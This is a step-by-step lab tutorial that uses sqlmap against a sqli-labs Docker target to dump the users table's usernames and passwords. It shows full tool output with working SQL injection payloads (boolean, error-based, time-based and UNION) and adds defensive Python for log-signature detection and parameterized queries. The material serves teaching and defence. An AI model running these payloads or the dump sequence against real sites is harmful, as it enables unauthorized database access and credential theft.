Contents
1 Introduction
Manual and semi-automated injection are slow, so routine, repetitive work can be handed to the excellent sqlmap. This lesson gives a brief introduction to the sqlmap tool through one of the most basic injections.
2 Lab overview
2.1 Lab platform
- Target: CentOS 7 with Docker installed; sqli-labs is deployed in Docker as the lab platform. For the deployment steps see the article "Setting up the sqli-labs vulnerable environment on Docker".
- Attacker: Kali Linux; this lab uses the sqlmap bundled with Kali for automated injection.
- The target and the attacker are bridged onto the same LAN.
2.2 Lab goal
Extract the account names and passwords stored in the site's back-end database.
3 Lab procedure
3.1 Warm-up
- Open Kali, search for "sql" in the menu, and click sqlmap when the following screen appears.
- The window that opens looks like this.
- Open a browser on Kali and visit the target's sqli-labs page.
3.2 Identifying the injection point and injection type
- In a Kali terminal, to be on the safe side, run
sudo -i
to log in as root for the lab.
- Then run
sqlmap -u "http://192.168.1.4/Less-1/?id=1"
to test whether the target site's parameter is injectable. The run is shown below: the program determines the data type of the parameter id and the feasible injection methods, tests the four basic injection techniques and performs an initial run of each, and for UNION injection it automatically determines the number of columns in the displayed data, which greatly reduces manual work.
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] kali 的密码:
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1"
___
__H__
___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:55:45 /2022-02-21/
[09:55:46] [INFO] testing connection to the target URL
[09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:55:46] [INFO] testing if the target URL content is stable
[09:55:47] [INFO] target URL content is stable
[09:55:47] [INFO] testing if GET parameter 'id' is dynamic
[09:55:47] [INFO] GET parameter 'id' appears to be dynamic
[09:55:47] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:55:47] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:55:47] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[09:56:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:56:01] [WARNING] reflective value(s) found and filtering out
[09:56:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:56:01] [INFO] testing 'Generic inline queries'
[09:56:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:56:01] [INFO] GET parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[09:56:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:56:01] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)
[09:56:11] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:56:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:56:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:56:11] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:56:11] [INFO] target URL appears to have 3 columns in query
[09:56:11] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[09:57:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[09:57:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 09:57:03 /2022-02-21/
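From the defender's side, the run above leaves a distinctive trace in the web server's access log: the four payload types sqlmap reported, a burst of requests against a single parameter, and sqlmap's default User-Agent. The following Python script is an added example, not part of the original lesson or of sqlmap itself; it scans Apache combined-log lines for those signatures. The log lines are constructed from the payloads listed above, and the client IP 192.168.1.7, timestamps, response sizes and browser User-Agent are assumed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-log lines. The query strings are the four payloads sqlmap reported for
# GET parameter 'id' above, URL-encoded as a client sends them (the UNION payload's long hex marker is
# shortened); the User-Agent on the flagged lines is sqlmap's default.
SAMPLE_LOG = """\
192.168.1.7 - - [21/Feb/2022:09:55:46 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/91.0"
192.168.1.7 - - [21/Feb/2022:09:56:01 +0800] "GET /Less-1/?id=1%27%20AND%208953%3D8953%20AND%20%27jWWA%27%3D%27jWWA HTTP/1.1" 200 733 "-" "sqlmap/1.5.11#stable (https://sqlmap.org)"
192.168.1.7 - - [21/Feb/2022:09:56:01 +0800] "GET /Less-1/?id=1%27%20AND%20EXTRACTVALUE%282406%2CCONCAT%280x5c%2C0x716a7a7071%2C%28SELECT%20%28ELT%282406%3D2406%2C1%29%29%29%2C0x7176766271%29%29%20AND%20%27sOBt%27%3D%27sOBt HTTP/1.1" 200 712 "-" "sqlmap/1.5.11#stable (https://sqlmap.org)"
192.168.1.7 - - [21/Feb/2022:09:56:06 +0800] "GET /Less-1/?id=1%27%20AND%20%28SELECT%206435%20FROM%20%28SELECT%28SLEEP%285%29%29%29JDxU%29%20AND%20%27KsSg%27%3D%27KsSg HTTP/1.1" 200 733 "-" "sqlmap/1.5.11#stable (https://sqlmap.org)"
192.168.1.7 - - [21/Feb/2022:09:56:11 +0800] "GET /Less-1/?id=-3927%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716a7a7071%2C0x41%2C0x7176766271%29%2CNULL--%20- HTTP/1.1" 200 701 "-" "sqlmap/1.5.11#stable (https://sqlmap.org)"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# One signature per technique seen in the run above, matched on the URL-decoded query string.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),  # AND 8953=8953
    "error-based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

def parse_line(line):
    """Split one combined-log line into fields and URL-decode its query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, query = rec["target"].partition("?")
    rec["query"] = unquote(query)
    return rec

def classify(rec):
    """Names of the techniques whose signature appears in the decoded query."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(rec["query"]))

def analyze(log_text):
    """Flag every request that matches a signature or carries sqlmap's default User-Agent."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        techniques = classify(rec)
        tool_ua = rec["ua"].lower().startswith("sqlmap/")
        if techniques or tool_ua:
            findings.append({"ip": rec["ip"], "path": rec["path"], "techniques": techniques,
                             "ua_is_sqlmap": tool_ua, "query": rec["query"]})
    return findings

def per_source(findings):
    """Flagged requests per (client IP, path): a burst against one path is the scan's footprint."""
    return Counter((f["ip"], f["path"]) for f in findings)
```

Calling `analyze(SAMPLE_LOG)` flags the four payload lines and leaves the plain `id=1` request alone; the User-Agent check is only a bonus, since it disappears as soon as the tool's `--random-agent` option is used, so the payload signatures and the per-source burst are the checks to rely on.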
3.3 Enumerating database names
- When to use: only after the site has been confirmed injectable.
- Command format:
sqlmap -u <injection-point URL> --dbs
lists all databases on the current site's back-end.
- Command format:
sqlmap -u <injection-point URL> --current-db
returns the database the current site uses.
- Having confirmed in the previous step that the site and its parameter are injectable, run sqlmap -u "http://192.168.1.4/Less-1/?id=1" --dbs to list every back-end database, then sqlmap -u "http://192.168.1.4/Less-1/?id=1" --current-db. From the program's output we learn that the back-end has 5 databases in total and that the current database is 'security'.
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:52:31 /2022-02-21/
[10:52:31] [INFO] resuming back-end DBMS 'mysql'
[10:52:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[10:52:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[10:52:31] [INFO] fetching database names
[10:52:31] [INFO] retrieved: 'information_schema'
[10:52:31] [INFO] retrieved: 'challenges'
[10:52:31] [INFO] retrieved: 'mysql'
[10:52:31] [INFO] retrieved: 'performance_schema'
[10:52:31] [INFO] retrieved: 'security'
available databases [5]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[10:52:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 10:52:31 /2022-02-21/
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" --current-db 2 ⨯
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:03:20 /2022-02-21/
[11:03:20] [INFO] resuming back-end DBMS 'mysql'
[11:03:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:03:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.1
[11:03:20] [INFO] fetching current database
current database: 'security'
[11:03:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:03:20 /2022-02-21/
3.4 Enumerating table names
- When to use: after the databases have been enumerated.
- Function: list the tables in a database. A database can be specified; if none is given, every database is queried.
- Command format:
sqlmap -u <injection-point URL> -D <database> --tables
- In the previous step we established that the current database is 'security', so run sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' --tables to list the tables it contains. The output is shown below: there are 4 tables, and the users table is the target of the next step.
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' --tables
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:10:44 /2022-02-21/
[11:10:44] [INFO] resuming back-end DBMS 'mysql'
[11:10:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:10:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[11:10:45] [INFO] fetching tables for database: 'security'
[11:10:45] [INFO] retrieved: 'emails'
[11:10:45] [INFO] retrieved: 'referers'
[11:10:45] [INFO] retrieved: 'uagents'
[11:10:45] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[11:10:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:10:45 /2022-02-21/
3.5 Enumerating column names
- When to use: after the table names have been retrieved.
- Function: list all column names of a table.
- Command format:
sqlmap -u <injection-point URL> -D <database> -T <table> --columns
- With the database and table names known, run sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' --columns to list the columns of the target table. There are three columns: id, username and password.
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' --columns
___
__H__
___ ___[,]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:13:53 /2022-02-21/
[11:13:54] [INFO] resuming back-end DBMS 'mysql'
[11:13:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:13:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.1
[11:13:54] [INFO] fetching columns for table 'users' in database 'security'
[11:13:54] [INFO] retrieved: 'id','int(3)'
[11:13:54] [INFO] retrieved: 'username','varchar(20)'
[11:13:54] [INFO] retrieved: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[11:13:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:13:54 /2022-02-21/
3.6 Dumping column contents
- When to use: after the column names have been retrieved.
- Function: retrieve the actual data stored in the columns.
- Command format:
sqlmap -u <injection-point URL> -D <database> -T <table> -C <columns> --dump
When several columns are wanted, separate them with ASCII commas.
- After the steps above, run sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' -C id,username,password --dump to retrieve every account and password. As shown below, there are 13 of them, neatly laid out.
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.1.4/Less-1/?id=1" -D 'security' -T 'users' -C id,username,password --dump
___
__H__
___ ___["]_____ ___ ___ {1.5.11#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:18:32 /2022-02-21/
[11:18:33] [INFO] resuming back-end DBMS 'mysql'
[11:18:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8953=8953 AND 'jWWA'='jWWA
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(2406,CONCAT(0x5c,0x716a7a7071,(SELECT (ELT(2406=2406,1))),0x7176766271)) AND 'sOBt'='sOBt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6435 FROM (SELECT(SLEEP(5)))JDxU) AND 'KsSg'='KsSg
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3927' UNION ALL SELECT NULL,CONCAT(0x716a7a7071,0x556a6644676f6162654467796a634b6a556e6d4b72494a53546f654b5568646f49736f4f59544647,0x7176766271),NULL-- -
---
[11:18:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.1
[11:18:33] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
[11:18:33] [INFO] retrieved: '1','Dumb','Dumb'
[11:18:33] [INFO] retrieved: '2','I-kill-you','Angelina'
[11:18:33] [INFO] retrieved: '3','p@ssword','Dummy'
[11:18:33] [INFO] retrieved: '4','crappy','secure'
[11:18:33] [INFO] retrieved: '5','stupidity','stupid'
[11:18:33] [INFO] retrieved: '6','genious','superman'
[11:18:33] [INFO] retrieved: '7','mob!le','batman'
[11:18:33] [INFO] retrieved: '8','admin','admin'
[11:18:33] [INFO] retrieved: '9','admin1','admin1'
[11:18:33] [INFO] retrieved: '10','admin2','admin2'
[11:18:33] [INFO] retrieved: '11','admin3','admin3'
[11:18:33] [INFO] retrieved: '12','dumbo','dhakkan'
[11:18:33] [INFO] retrieved: '14','admin4','admin4'
Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
[11:18:33] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.4/dump/security/users.csv'
[11:18:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.4'
[*] ending @ 11:18:33 /2022-02-21/
3.7 Lab result
The account names and passwords in the back-end database were retrieved successfully.
3.8 Extra: batch testing
- sqlmap can read requests from several kinds of files for SQL injection testing. Such request files can be produced by intercepting traffic with Burp Suite; for capturing a site's requests and saving them to a file see "Intercepting requests with Burp Suite and saving them to a file". sqlmap selects the file type by option, for example:
  - -l: read an HTTP request log file from Burp Suite Proxy or WebScarab Proxy;
  - -x: read targets from a sitemap.xml file;
  - -m: read several targets from a multi-line text file and test all of them;
  - -r: read an HTTP request from a text file as the injection target;
  - -c: read targets from the sqlmap.conf configuration file.
- Following the steps in "Intercepting requests with Burp Suite and saving them to a file", generate the request log file http_req, saved on the desktop.
- Run
sqlmap -l /home/kali/桌面/http_req
to read the requests from that file and test them in batch. The path can be checked by right-clicking http_req and viewing its properties; adjust it to your own setup rather than copying it verbatim. During the run, [1/2] shows which request is currently being tested and how many requests there are in total.
4 Summary
- sqlmap is highly automated and greatly improves working efficiency;
- Learn sqlmap's common commands;
- Following the output of sqlmap's automated run deepens one's understanding of how injection works.
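The dump succeeds because Less-1 pastes the id parameter straight into a quoted SQL string, which is why every payload above starts with a closing quote. The following Python/sqlite3 snippet is an added example and not the lab's own PHP code: it rebuilds that lookup with string concatenation beside a parameterized version, seeds an in-memory table with the first three rows of the dump, and shows that the page's boolean-blind payload acts as a true/false oracle against the former and matches nothing against the latter. The function names and the false twin of the payload are assumed.

```python
import sqlite3

# Constructed in-memory stand-in for sqli-labs' security.users table, seeded with the
# first three rows the dump above returned (passwords in plain text, as the lab stores them).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")])
    return conn

# The boolean-based blind payload sqlmap reported above, plus an assumed false twin:
# the only difference is whether the appended comparison holds.
BOOLEAN_TRUE = "1' AND 8953=8953 AND 'jWWA'='jWWA"
BOOLEAN_FALSE = "1' AND 8953=8954 AND 'jWWA'='jWWA"

def lookup_vulnerable(conn, user_id):
    """Quote-delimited string concatenation, the pattern that makes Less-1's id injectable.
    The payload's leading quote closes the literal and its tail re-opens one, so the
    statement still parses and the injected condition decides whether a row comes back."""
    sql = "SELECT username, password FROM users WHERE id='%s' LIMIT 1" % user_id
    return conn.execute(sql).fetchone()

def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is data only and cannot alter the statement's structure."""
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()

def lookup_typed(conn, user_id):
    """Defence in depth: reject anything that is not an integer before it reaches SQL."""
    try:
        return lookup_parameterized(conn, int(user_id))
    except (TypeError, ValueError):
        return None

def oracle_visible(lookup, conn):
    """True if the true and false payloads produce different responses, i.e. the page
    behaves as a boolean oracle for that lookup implementation."""
    return lookup(conn, BOOLEAN_TRUE) != lookup(conn, BOOLEAN_FALSE)

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_vulnerable, lookup_parameterized, lookup_typed):
        print(f"{fn.__name__:20s} id=1 -> {fn(db, '1')}  oracle visible: {oracle_visible(fn, db)}")
```

Only the concatenating version answers differently to the two payloads; the bound-parameter versions return the same empty result for both, which is what closes the blind channel sqlmap exploited above.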